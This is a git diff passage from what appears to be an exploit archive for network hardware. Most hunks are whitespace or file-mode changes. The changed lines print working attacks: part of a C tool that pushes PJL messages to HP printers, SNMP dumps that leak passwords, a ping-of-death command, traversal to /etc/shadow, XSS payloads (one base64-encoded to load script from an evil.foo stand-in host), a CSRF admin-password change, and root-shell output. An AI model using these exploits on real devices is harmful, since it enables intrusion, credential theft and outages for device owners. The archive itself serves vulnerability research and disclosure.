(host=gethostbyname(argv[1])) == NULL) { - perror("gethostbyname"); - exit(1); - } + if ( (host=gethostbyname(argv[1])) == NULL) { + perror("gethostbyname"); + exit(1); + } - printf ("HP Display hack -- sili@l0pht.com\n"); - printf ("Hostname: %s\n", argv[1]); - printf ("Message: %s\n",argv[2]); + printf ("HP Display hack -- sili@l0pht.com\n"); + printf ("Hostname: %s\n", argv[1]); + printf ("Message: %s\n",argv[2]); - /* Prepare dest_addr */ - dest_addr.sin_family= host->h_addrtype; /* AF_INET from gethostbyname */ - dest_addr.sin_port= htons(PORT) ; /* PORT defined above */ + /* Prepare dest_addr */ + dest_addr.sin_family= host->h_addrtype; /* AF_INET from gethostbyname */ + dest_addr.sin_port= htons(PORT) ; /* PORT defined above */ - /* Prepare dest_addr */ - bcopy(host->h_addr, (char *) &dest_addr.sin_addr, host->h_length); + /* Prepare dest_addr */ + bcopy(host->h_addr, (char *) &dest_addr.sin_addr, host->h_length); - bzero(&(dest_addr.sin_zero), 8); /* Take care of sin_zero ??? */ + bzero(&(dest_addr.sin_zero), 8); /* Take care of sin_zero ??? */ - /* Get socket */ - /* printf ("Grabbing socket....\n"); */ - if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0) { - perror("socket"); - exit(1); - } + /* Get socket */ +/* printf ("Grabbing socket....\n"); */ + if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0) { + perror("socket"); + exit(1); + } - /* Connect !*/ + /* Connect !*/ - printf ("Connecting....\n"); + printf ("Connecting....\n"); - if (connect(sockfd, (struct sockaddr *)&dest_addr,sizeof(dest_addr)) == -1){ - perror("connect"); - exit(1);} + if (connect(sockfd, (struct sockaddr *)&dest_addr,sizeof(dest_addr)) == -1){ + perror("connect"); + exit(1);} - /* Preparing JPL Command */ + /* Preparing JPL Command */ - strcpy(line,"\033%-12345X@PJL RDYMSG DISPLAY = \""); - strncat(line,argv[2],16); - strcat(line,"\"\r\n\033%-12345X\r\n"); + strcpy(line,"\033%-12345X@PJL RDYMSG DISPLAY = \""); + strncat(line,argv[2],16); + strcat(line,"\"\r\n\033%-12345X\r\n"); - /* Sending data! */ + /* Sending data! */ - /* printf ("Sending Data...%d\n",strlen(line));*/ - /* printf ("Line: %s\n",line); */ - bytes_sent=send(sockfd,line,strlen(line),0); +/* printf ("Sending Data...%d\n",strlen(line));*/ +/* printf ("Line: %s\n",line); */ + bytes_sent=send(sockfd,line,strlen(line),0); - printf("Sent %d bytes\n",bytes_sent); - close(sockfd); - } \ No newline at end of file + printf("Sent %d bytes\n",bytes_sent); + close(sockfd); +} \ No newline at end of file diff --git a/platforms/hardware/remote/20652.txt b/platforms/hardware/remote/20652.txt old mode 100755 new mode 100644 index 76229739e..c2fff14d9 --- a/platforms/hardware/remote/20652.txt +++ b/platforms/hardware/remote/20652.txt @@ -6,4 +6,4 @@ A problem in the versions of IOS 11.x and 12.0 could allow unauthorized access t It is possible for a malicious remote user to change configuration objects within the MIB-II Community, and rename the system, change the location name in the system, and/or the contact information for the system. This vulnerability affects only certain devices. -snmpwalk router ILMI |more \ No newline at end of file +snmpwalk router ILMI |more \ No newline at end of file diff --git a/platforms/hardware/remote/20806.txt b/platforms/hardware/remote/20806.txt old mode 100755 new mode 100644 index b1f1b1c0d..e9f017e5e --- a/platforms/hardware/remote/20806.txt +++ b/platforms/hardware/remote/20806.txt @@ -16,4 +16,4 @@ This can lead to improper cooling of the ink/crayon reservoir, physically damagi Submit http://printername/_ncl_items.shtml&SUBJECT=1 -Select "Shutdown" option = "Emergency Power Off". \ No newline at end of file +Select "Shutdown" option = "Emergency Power Off". \ No newline at end of file diff --git a/platforms/hardware/remote/20892.txt b/platforms/hardware/remote/20892.txt old mode 100755 new mode 100644 index a357744c8..b007721b9 --- a/platforms/hardware/remote/20892.txt +++ b/platforms/hardware/remote/20892.txt @@ -6,4 +6,4 @@ A problem with Olicom routers could allow unauthorized access to certain configu This problem makes it possible for a remote user to launch a social engineering attack, potentially gaining unauthorized access to the device. -snmpwalk router ILMI |more \ No newline at end of file +snmpwalk router ILMI |more \ No newline at end of file diff --git a/platforms/hardware/remote/20976.c b/platforms/hardware/remote/20976.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/21186.txt b/platforms/hardware/remote/21186.txt old mode 100755 new mode 100644 index e34f0badf..feef3a6fb --- a/platforms/hardware/remote/21186.txt +++ b/platforms/hardware/remote/21186.txt @@ -4,4 +4,4 @@ Prestige is a product line of DSL routers produced and distributed by Zyxel. When a Zyxel router receives fragmented packets that after reassembly is greater than 64 kilobytes in length, the router crashes. The router must be power cycled to resume normal operation. This could lead to a remote user denying service to a legitimate user of the router. The router is affected only by fragmented packets received through the DSL interface. Fragmented packets sent through the LAN interface have no affect on the system. -ping -t -l 65500 victim.example.com \ No newline at end of file +ping -t -l 65500 victim.example.com \ No newline at end of file diff --git a/platforms/hardware/remote/21285.txt b/platforms/hardware/remote/21285.txt old mode 100755 new mode 100644 index 5fef4f355..9f6ceebba --- a/platforms/hardware/remote/21285.txt +++ b/platforms/hardware/remote/21285.txt @@ -8,4 +8,4 @@ The attacker may allegedly change the superuser password of the device via this *Reportedly, the password is stored in plain text and can be revealed by viewing the source of the web page. -http://host/security/web_access.html \ No newline at end of file +http://host/security/web_access.html \ No newline at end of file diff --git a/platforms/hardware/remote/2136.txt b/platforms/hardware/remote/2136.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/21378.txt b/platforms/hardware/remote/21378.txt old mode 100755 new mode 100644 index f485347e8..5a5547689 --- a/platforms/hardware/remote/21378.txt +++ b/platforms/hardware/remote/21378.txt @@ -6,4 +6,4 @@ The device contains a default SNMP community string of "public", which may allow The following example was provided: -snmpwalk CVX-IP-ADD-RESS public .1 \ No newline at end of file +snmpwalk CVX-IP-ADD-RESS public .1 \ No newline at end of file diff --git a/platforms/hardware/remote/21441.txt b/platforms/hardware/remote/21441.txt old mode 100755 new mode 100644 index cefcd9a43..f0a0b3e9b --- a/platforms/hardware/remote/21441.txt +++ b/platforms/hardware/remote/21441.txt @@ -4,4 +4,4 @@ The Cisco ATA-186 Analog Telephone Adapter is a hardware device designed to inte Reportedly, HTTP requests consisting of a single character will cause the device to disclose sensitive configuration information, including the password to the administrative web interface. -curl -d a http://ata186.example.com/dev \ No newline at end of file +curl -d a http://ata186.example.com/dev \ No newline at end of file diff --git a/platforms/hardware/remote/2145.txt b/platforms/hardware/remote/2145.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/21456.txt b/platforms/hardware/remote/21456.txt old mode 100755 new mode 100644 index 3161d0175..e2d7e56c1 --- a/platforms/hardware/remote/21456.txt +++ b/platforms/hardware/remote/21456.txt @@ -4,4 +4,4 @@ IDS Device Manager is a web interface to the Cisco IDS systems. It is distribute The IDS Device Manager may allow a remote user to gain access to sensitive information on the system. Due to improper handling of user-supplied input, it is possible for a user to gain access to arbitrary files on the system using an elementary directory traversal attack. By placing a request to the process, with an appended dot-dot-slash (../) tag pointing to a file, a remote user may read the specified file on the affected system. -https://example.com/../../../../../etc/shadow \ No newline at end of file +https://example.com/../../../../../etc/shadow \ No newline at end of file diff --git a/platforms/hardware/remote/21513.c b/platforms/hardware/remote/21513.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/21699.txt b/platforms/hardware/remote/21699.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/21827.txt b/platforms/hardware/remote/21827.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/21983.c b/platforms/hardware/remote/21983.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/22236.txt b/platforms/hardware/remote/22236.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/22244.txt b/platforms/hardware/remote/22244.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/22271.c b/platforms/hardware/remote/22271.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/22319.txt b/platforms/hardware/remote/22319.txt old mode 100755 new mode 100644 index 0ba285fe2..e9af3b4ea --- a/platforms/hardware/remote/22319.txt +++ b/platforms/hardware/remote/22319.txt @@ -6,4 +6,4 @@ A problem with JetDirect printers could make it possible for a remote user to ga It has been reported that HP JetDirect printers leak the web JetAdmin device password under some circumstances. By sending an SNMP GET request to a vulnerable printer, the printer will return the hex-encoded device password to the requester. This could allow a remote user to access and change configuration of the printer. -C:\>snmputil get example.printer public .1.3.6.1.4.1.11.2.3.9.1.1.13.0 \ No newline at end of file +C:\>snmputil get example.printer public .1.3.6.1.4.1.11.2.3.9.1.1.13.0 \ No newline at end of file diff --git a/platforms/hardware/remote/22350.txt b/platforms/hardware/remote/22350.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/22394.txt b/platforms/hardware/remote/22394.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/22416.txt b/platforms/hardware/remote/22416.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/22453.txt b/platforms/hardware/remote/22453.txt old mode 100755 new mode 100644 index 83c00247c..8ffe4f40f --- a/platforms/hardware/remote/22453.txt +++ b/platforms/hardware/remote/22453.txt @@ -15,4 +15,4 @@ xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"> <u:GetUserName xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1" /> </s:Body> -</s:Envelope> \ No newline at end of file +</s:Envelope> \ No newline at end of file diff --git a/platforms/hardware/remote/22455.txt b/platforms/hardware/remote/22455.txt old mode 100755 new mode 100644 index f035f42a0..deaf42e1b --- a/platforms/hardware/remote/22455.txt +++ b/platforms/hardware/remote/22455.txt @@ -35,4 +35,4 @@ dt:dt="string">NetBios</NewPortMappingDescription> dt:dt="ui4">0</NewLeaseDuration> </m:AddPortMapping> </SOAP-ENV:Body> -</SOAP-ENV:Envelope> \ No newline at end of file +</SOAP-ENV:Envelope> \ No newline at end of file diff --git a/platforms/hardware/remote/22480.txt b/platforms/hardware/remote/22480.txt old mode 100755 new mode 100644 index ac814032e..1a9126102 --- a/platforms/hardware/remote/22480.txt +++ b/platforms/hardware/remote/22480.txt @@ -8,4 +8,4 @@ Data collected in this manner may be used in further attacks against the victim It should be noted that this issue has also been reported to affect the Linksys BEFSR81 appliance. -snmpwalk -v 1 -c public {ip} \ No newline at end of file +snmpwalk -v 1 -c public {ip} \ No newline at end of file diff --git a/platforms/hardware/remote/22532.txt b/platforms/hardware/remote/22532.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/22533.txt b/platforms/hardware/remote/22533.txt old mode 100755 new mode 100644 index f44cf181e..a9abbb4c7 --- a/platforms/hardware/remote/22533.txt +++ b/platforms/hardware/remote/22533.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/7426/info It has been reported that Nokia IPSO does not properly handle some types of requests through Voyager. Because of this, an attacker with access to the interface may be able to view potentially sensitive information. -http://www.example.com/cgi-bin/readfile.tcl?file=/etc/master.passwd \ No newline at end of file +http://www.example.com/cgi-bin/readfile.tcl?file=/etc/master.passwd \ No newline at end of file diff --git a/platforms/hardware/remote/22626.txt b/platforms/hardware/remote/22626.txt old mode 100755 new mode 100644 index ddc7c8148..686c5fac0 --- a/platforms/hardware/remote/22626.txt +++ b/platforms/hardware/remote/22626.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7652/info A vulnerability has been discovered in various Axis Communications products. By making a request for a specially formatted URL, it may be possible for remote users to access the administrative configuration interface without being prompted for authentication. -http://camera-ip//admin/admin.shtml \ No newline at end of file +http://camera-ip//admin/admin.shtml \ No newline at end of file diff --git a/platforms/hardware/remote/22898.txt b/platforms/hardware/remote/22898.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/23212.txt b/platforms/hardware/remote/23212.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/23317.txt b/platforms/hardware/remote/23317.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/23376.txt b/platforms/hardware/remote/23376.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/23377.txt b/platforms/hardware/remote/23377.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/23378.txt b/platforms/hardware/remote/23378.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/23379.txt b/platforms/hardware/remote/23379.txt old mode 100755 new mode 100644 index 6198172b6..3cd7ea104 --- a/platforms/hardware/remote/23379.txt +++ b/platforms/hardware/remote/23379.txt @@ -10,4 +10,4 @@ http://www.example.com/theme1/selector?button=status,monitor,session&button_url= http://www.example.com/theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter"><script>alert('oops')</script>,/system/status/session -http://www.example.com/theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter,/system/status/session"><script>alert('oops')</script> \ No newline at end of file +http://www.example.com/theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter,/system/status/session"><script>alert('oops')</script> \ No newline at end of file diff --git a/platforms/hardware/remote/23527.txt b/platforms/hardware/remote/23527.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/23528.txt b/platforms/hardware/remote/23528.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/23545.txt b/platforms/hardware/remote/23545.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/23721.txt b/platforms/hardware/remote/23721.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/23764.txt b/platforms/hardware/remote/23764.txt old mode 100755 new mode 100644 index 93a845896..2d5135904 --- a/platforms/hardware/remote/23764.txt +++ b/platforms/hardware/remote/23764.txt @@ -6,4 +6,4 @@ The issue is reported to exist due to improper sanitizing of user-supplied data. Successful exploitation of this vulnerability may allow an attacker to steal cookie-based authentication credentials. If an attacker manages to steal a cookie for a valid session, the attacker may leverage the vulnerability to gain management rights to the affected device. -https://example.com:2456/sgmi/<script>badscript</script> \ No newline at end of file +https://example.com:2456/sgmi/<script>badscript</script> \ No newline at end of file diff --git a/platforms/hardware/remote/23808.txt b/platforms/hardware/remote/23808.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/23855.txt b/platforms/hardware/remote/23855.txt old mode 100755 new mode 100644 index a867f4ebb..2f8af1234 --- a/platforms/hardware/remote/23855.txt +++ b/platforms/hardware/remote/23855.txt @@ -134,4 +134,4 @@ drwxr-xr-x 7 0 0 1024 Jan 1 1970 var / # echo pwnd! :) & exit pwnd! :) Connection closed by foreign host. -root@debian:~# \ No newline at end of file +root@debian:~# \ No newline at end of file diff --git a/platforms/hardware/remote/24065.java b/platforms/hardware/remote/24065.java old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/24115.c b/platforms/hardware/remote/24115.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/24140.txt b/platforms/hardware/remote/24140.txt old mode 100755 new mode 100644 index 5010453d4..1b9d1da63 --- a/platforms/hardware/remote/24140.txt +++ b/platforms/hardware/remote/24140.txt @@ -4,4 +4,4 @@ It is reported that users may bypass Netgear RP114 content filter functionality. This vulnerability may result in a false sense of security for a network administrator, where a malicious website is believed to be unreachable. In reality any host may contact blacklisted websites. -http://www.example.com/?%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 \ No newline at end of file +http://www.example.com/?%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 \ No newline at end of file diff --git a/platforms/hardware/remote/24226.txt b/platforms/hardware/remote/24226.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/24230.txt b/platforms/hardware/remote/24230.txt old mode 100755 new mode 100644 index ad026ed45..4f68dc66f --- a/platforms/hardware/remote/24230.txt +++ b/platforms/hardware/remote/24230.txt @@ -29,4 +29,4 @@ SNMPv2-SMI::transmission.23.2.3.1.6.0.6 = "" SNMPv2-SMI::transmission.23.2.3.1.6.0.7 = "" SNMPv2-SMI::transmission.23.2.3.1.6.0.8 = "" SNMPv2-SMI::transmission.23.2.3.1.6.5.1 = STRING: "password" -[snip] \ No newline at end of file +[snip] \ No newline at end of file diff --git a/platforms/hardware/remote/24681.txt b/platforms/hardware/remote/24681.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/24760.txt b/platforms/hardware/remote/24760.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/24892.txt b/platforms/hardware/remote/24892.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/25359.txt b/platforms/hardware/remote/25359.txt old mode 100755 new mode 100644 index dc23d3268..89d8a872c --- a/platforms/hardware/remote/25359.txt +++ b/platforms/hardware/remote/25359.txt @@ -4,4 +4,4 @@ A remote authentication bypass vulnerability affects Linksys WET11. This issue i An attacker may leverage this issue to arbitrarily change the administration password of an affected device, facilitating a complete compromise of the device. -http://www.example.com/changepw.html?data=........................ \ No newline at end of file +http://www.example.com/changepw.html?data=........................ \ No newline at end of file diff --git a/platforms/hardware/remote/254.c b/platforms/hardware/remote/254.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/25684.html b/platforms/hardware/remote/25684.html old mode 100755 new mode 100644 index 874cecb7d..b56f92552 --- a/platforms/hardware/remote/25684.html +++ b/platforms/hardware/remote/25684.html @@ -35,4 +35,4 @@ document.DownloadConfig.submit(); enctype="multipart/form-data"> <input type="Submit" name="config" value="Download" onClick="javascript:invia_richiesta();"><br> -</form></body></html> \ No newline at end of file +</form></body></html> \ No newline at end of file diff --git a/platforms/hardware/remote/25966.txt b/platforms/hardware/remote/25966.txt old mode 100755 new mode 100644 index 115166a31..5bebbccb4 --- a/platforms/hardware/remote/25966.txt +++ b/platforms/hardware/remote/25966.txt @@ -10,4 +10,4 @@ Transfer complete. 257 bytes sent in 0.9 secs (2855.56 B/s) ftp> ls -rwdx 257 uid=0(root) gid=0(root) groups=0(root) -Command complete. \ No newline at end of file +Command complete. \ No newline at end of file diff --git a/platforms/hardware/remote/25987.txt b/platforms/hardware/remote/25987.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/26022.txt b/platforms/hardware/remote/26022.txt old mode 100755 new mode 100644 index 252b8dec6..03798e975 --- a/platforms/hardware/remote/26022.txt +++ b/platforms/hardware/remote/26022.txt @@ -6,4 +6,4 @@ An attacker can disclose the administrator password through the Web interface of This can lead to a complete compromise of the router. -http://www.example.com/cgi-bin/firmwarecfg \ No newline at end of file +http://www.example.com/cgi-bin/firmwarecfg \ No newline at end of file diff --git a/platforms/hardware/remote/26075.txt b/platforms/hardware/remote/26075.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/26168.txt b/platforms/hardware/remote/26168.txt old mode 100755 new mode 100644 index 9e68984c8..efd167777 --- a/platforms/hardware/remote/26168.txt +++ b/platforms/hardware/remote/26168.txt @@ -39,4 +39,4 @@ $ ike-scan -A -M --id=invalid@hotmail.com 10.0.0.1 Starting ike-scan 1.7.7 with 1 hosts (http://www.nta-monitor.com/ike-scan/) Ending ike-scan 1.7.7: 1 hosts scanned in 2.467 seconds (0.41 hosts/sec). 0 -returned handshake; 0 returned notify \ No newline at end of file +returned handshake; 0 returned notify \ No newline at end of file diff --git a/platforms/hardware/remote/2638.c b/platforms/hardware/remote/2638.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/27319.txt b/platforms/hardware/remote/27319.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/27452.txt b/platforms/hardware/remote/27452.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/27706.txt b/platforms/hardware/remote/27706.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/27830.java b/platforms/hardware/remote/27830.java old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/27873.txt b/platforms/hardware/remote/27873.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/27891.txt b/platforms/hardware/remote/27891.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/27892.txt b/platforms/hardware/remote/27892.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/27893.txt b/platforms/hardware/remote/27893.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/27894.txt b/platforms/hardware/remote/27894.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/27923.txt b/platforms/hardware/remote/27923.txt old mode 100755 new mode 100644 index 7e7fd4f15..00649f778 --- a/platforms/hardware/remote/27923.txt +++ b/platforms/hardware/remote/27923.txt @@ -4,4 +4,4 @@ The D-Link Airspot DSA-3100 Gateway device is prone to a cross-site scripting vu An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/login_error .shtml?uname=%3CBODY%20ONLOAD =alert(&#039;www.eazel.es&#039;)%3E \ No newline at end of file +http://www.example.com/login_error .shtml?uname=%3CBODY%20ONLOAD =alert(&#039;www.eazel.es&#039;)%3E \ No newline at end of file diff --git a/platforms/hardware/remote/28056.txt b/platforms/hardware/remote/28056.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/28847.txt b/platforms/hardware/remote/28847.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/28848.txt b/platforms/hardware/remote/28848.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/28888.txt b/platforms/hardware/remote/28888.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/29945.txt b/platforms/hardware/remote/29945.txt old mode 100755 new mode 100644 index e6d5e5ad8..f98ec3596 --- a/platforms/hardware/remote/29945.txt +++ b/platforms/hardware/remote/29945.txt @@ -4,4 +4,4 @@ D-Link DSL-G624T is prone to a cross-site scripting vulnerability. This issue is An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/cgi-bin/webcm?getpage=../html/home/home_RelaodHref.htm&var:RelaodHref=a"%20==%20"a"){alert("XSS")}}</script> \ No newline at end of file +http://www.example.com/cgi-bin/webcm?getpage=../html/home/home_RelaodHref.htm&var:RelaodHref=a"%20==%20"a"){alert("XSS")}}</script> \ No newline at end of file diff --git a/platforms/hardware/remote/30164.txt b/platforms/hardware/remote/30164.txt old mode 100755 new mode 100644 index ee5a47e16..276861991 --- a/platforms/hardware/remote/30164.txt +++ b/platforms/hardware/remote/30164.txt @@ -6,4 +6,4 @@ Exploiting this vulnerability may allow an attacker to perform cross-site script This issue affects OfficeConnect Secure Router firmware 1.04-168; other versions may also be affected. -http://example.com/cgi-bin/admin?page=1&tk=>[xss] \ No newline at end of file +http://example.com/cgi-bin/admin?page=1&tk=>[xss] \ No newline at end of file diff --git a/platforms/hardware/remote/30254.txt b/platforms/hardware/remote/30254.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/30485.html b/platforms/hardware/remote/30485.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/30650.txt b/platforms/hardware/remote/30650.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/30652.txt b/platforms/hardware/remote/30652.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/30673.txt b/platforms/hardware/remote/30673.txt old mode 100755 new mode 100644 index a7602d355..29cb17754 --- a/platforms/hardware/remote/30673.txt +++ b/platforms/hardware/remote/30673.txt @@ -4,4 +4,4 @@ NETGEAR ProSafe SSL VPN Concentrator 25-SSL312 is prone to a cross-site scriptin Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/cgi-bin/welcome/XYZ?err=[xss] \ No newline at end of file +http://www.example.com/cgi-bin/welcome/XYZ?err=[xss] \ No newline at end of file diff --git a/platforms/hardware/remote/30740.html b/platforms/hardware/remote/30740.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/30755.txt b/platforms/hardware/remote/30755.txt old mode 100755 new mode 100644 index 1462885f0..c7a020332 --- a/platforms/hardware/remote/30755.txt +++ b/platforms/hardware/remote/30755.txt @@ -11,4 +11,4 @@ F5 FirePass 4100 SSL VPNs running these firmware versions are vulnerable: 6.0.1 https://www.example.com/download_plugin.php3?js=&backurl=Ij48c2NyaXB0IHNyYz0iaHR0cDovL3d3dy5ldmlsLmZvby94c3MiPjwvc2NyaXB0PjxhIGhyZWY9Ig== -https://www.example.com/download_plugin.php3?js=&backurl=Ij48dGV4dGFyZWE+SFRNTCBpbmplY3Rpb24gdGVzdDwvdGV4dGFyZWE+PGEgaHJlZj0i \ No newline at end of file +https://www.example.com/download_plugin.php3?js=&backurl=Ij48dGV4dGFyZWE+SFRNTCBpbmplY3Rpb24gdGVzdDwvdGV4dGFyZWE+PGEgaHJlZj0i \ No newline at end of file diff --git a/platforms/hardware/remote/30833.html b/platforms/hardware/remote/30833.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/30834.txt b/platforms/hardware/remote/30834.txt old mode 100755 new mode 100644 index 9aa7d3625..d7b56c994 --- a/platforms/hardware/remote/30834.txt +++ b/platforms/hardware/remote/30834.txt @@ -9,4 +9,4 @@ F5 FirePass 4100 SSL VPNs running these firmware versions are vulnerable: 5.4.1 through 5.5.2 6.0 through 6.0.1 -https://target.tld/my.activation.php3?"></script><textarea>HTML_injection_test&lt;/textarea&gt;<!-- \ No newline at end of file +https://target.tld/my.activation.php3?"></script><textarea>HTML_injection_test&lt;/textarea&gt;<!-- \ No newline at end of file diff --git a/platforms/hardware/remote/30882.txt b/platforms/hardware/remote/30882.txt old mode 100755 new mode 100644 index c8fb3912d..d53c4e473 --- a/platforms/hardware/remote/30882.txt +++ b/platforms/hardware/remote/30882.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects Thomson SpeedTouch 716 firmware 6.2.17.50 and 5.4.0.14; other versions may also be affected. -http://www.example.com/cgi/b/ic/connect/?nm=1&client=192.168.1.72&server=&event=ServerTimeout&url=<script>alert('bla');</script> \ No newline at end of file +http://www.example.com/cgi/b/ic/connect/?nm=1&client=192.168.1.72&server=&event=ServerTimeout&url=<script>alert('bla');</script> \ No newline at end of file diff --git a/platforms/hardware/remote/30935.txt b/platforms/hardware/remote/30935.txt old mode 100755 new mode 100644 index 755219f9d..9abf5abd5 --- a/platforms/hardware/remote/30935.txt +++ b/platforms/hardware/remote/30935.txt @@ -24,4 +24,4 @@ ame=admin&newpass=santa_pw &confpass=santa_pw&submit-url=%2Fstatus.asp&save=Save" width="0" height="0"> </body> -</html> \ No newline at end of file +</html> \ No newline at end of file diff --git a/platforms/hardware/remote/31013.txt b/platforms/hardware/remote/31013.txt old mode 100755 new mode 100644 index 99bb1eaca..9a82fc702 --- a/platforms/hardware/remote/31013.txt +++ b/platforms/hardware/remote/31013.txt @@ -14,4 +14,4 @@ Disable Wireless Authentication http://192.168.1.254/xslt?PAGE=C05_POST&THISPAGE=C05&NEXTPAGE=C05_POST&NAME=encrypt_enabled&VALUE=0 Set Dynamic DNS -http://192.168.1.254/xslt?PAGE=J05_POST&THISPAGE=J05&NEXTPAGE=J05_POST&IP_DYNAMIC=TRUE \ No newline at end of file +http://192.168.1.254/xslt?PAGE=J05_POST&THISPAGE=J05&NEXTPAGE=J05_POST&IP_DYNAMIC=TRUE \ No newline at end of file diff --git a/platforms/hardware/remote/31024.txt b/platforms/hardware/remote/31024.txt old mode 100755 new mode 100644 index 7212fc62e..673098b63 --- a/platforms/hardware/remote/31024.txt +++ b/platforms/hardware/remote/31024.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br BIG-IP firmware version 9.4.3 is vulnerable; other versions may also be affected. -https://www.example.com?SearchString=%22%20type=%22hidden%22%3E%3Cscript%3Ealert(%22list-xss%22)%3C/script%3E%3Cinput%20type=%22hidden%22%20value=%22 \ No newline at end of file +https://www.example.com?SearchString=%22%20type=%22hidden%22%3E%3Cscript%3Ealert(%22list-xss%22)%3C/script%3E%3Cinput%20type=%22hidden%22%20value=%22 \ No newline at end of file diff --git a/platforms/hardware/remote/31031.txt b/platforms/hardware/remote/31031.txt old mode 100755 new mode 100644 index de428c49f..3e327cf28 --- a/platforms/hardware/remote/31031.txt +++ b/platforms/hardware/remote/31031.txt @@ -18,4 +18,4 @@ X-SomeHeader: ... packet 2: X-SomeOtherHeader: .... Host: www.example.com -... \ No newline at end of file +... \ No newline at end of file diff --git a/platforms/hardware/remote/31033.py b/platforms/hardware/remote/31033.py index 4a49c20c9..ab9294542 100755 --- a/platforms/hardware/remote/31033.py +++ b/platforms/hardware/remote/31033.py @@ -253,4 +253,4 @@ def main(): print " [*] %s exploit code has finished.\n" % finger if __name__ == "__main__": - main() \ No newline at end of file + main() \ No newline at end of file diff --git a/platforms/hardware/remote/31078.txt b/platforms/hardware/remote/31078.txt old mode 100755 new mode 100644 index a8405783f..69e826a89 --- a/platforms/hardware/remote/31078.txt +++ b/platforms/hardware/remote/31078.txt @@ -10,4 +10,4 @@ UPDATE: This BID has been retired because it has been found to be a duplicate of UPDATE (February 1, 2008): This BID is being reinstated. Further investigation and new information reveal that this vulnerability differs from the one described in BID 27246. -http://www.example.com/xslt?PAGE=H04_POST&PASSWORD=admin&PASSWORD_CONF=admin \ No newline at end of file +http://www.example.com/xslt?PAGE=H04_POST&PASSWORD=admin&PASSWORD_CONF=admin \ No newline at end of file diff --git 